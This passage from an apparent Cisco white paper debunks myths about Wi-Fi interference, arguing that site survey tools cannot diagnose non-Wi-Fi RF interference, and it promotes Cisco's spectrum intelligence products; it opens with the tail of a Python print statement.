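        print(f"n={n}: {res['before_ft']:.0f} ft -> {res['after_ft']:.1f} ft, "
              f"{res['after_sqft']:.0f} sq ft still affected")
```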
Myth #19: “My site survey tool can be used to find interference problems.”

A standard Wi-Fi site survey tool is designed to measure Wi-Fi coverage. It uses a Wi-Fi chipset to measure the signal strength of access points as you move around the building. Unfortunately, Wi-Fi chips are designed to see Wi-Fi signals only, and can’t tell you much about interference from other non-Wi-Fi devices. (This is the same limitation experienced when using a Wi-Fi packet analysis tool). A Wi-Fi site survey tool might indicate a general area where a non-Wi-Fi signal was observed. But the tool can’t help you determine the nature of the interference, the type of device causing it, or where the device is located. So you are left without a solution. You really need an RF-level tool to diagnose interference problems. The good news is that a few of the next-generation Wi-Fi site survey tools are being more closely integrated with RF-level tools in order to implement a complete solution.
Summary: Site survey tools measure coverage, but don’t solve your RF needs.
Myth #20: “RF analysis tools are too bulky and too expensive.”

Many RF analysis tools (such as large and expensive spectrum analyzers) are not enterprise friendly.
But Cisco’s RF spectrum analysis tools are designed to fit both your desired form factor (small cards that plug into your laptop) and your IT budget. And to make things even better, Cisco’s spectrum intelligence solutions make being an RF expert unnecessary.
Summary: Learn more about Cisco’s Spectrum Intelligence solutions at: http://www.cisco.com/en/US/partner/products/ps9393/index.html
Conclusion

There are many myths about the obstacles to high-performing and reliable WLAN services. A misunderstanding of the nature of Wi-Fi interference underlies many of these myths, as does the belief that better visibility into RF spectrum is a difficult and costly proposition. In fact, the idea that RF spectrum visibility is prohibitively difficult and expensive to achieve may be the most malicious myth of all.
Cisco Unified Wireless Network supports real-time spectrum intelligence for Wi-Fi networks. This industry-leading solution detects, classifies, and locates devices causing RF interference in the unlicensed 2.4-GHz and 5-GHz bands.
For information on ways to manage wireless interference, visit the Cisco RF solution page at: http://www.cisco.com/en/US/partn … utions_package.html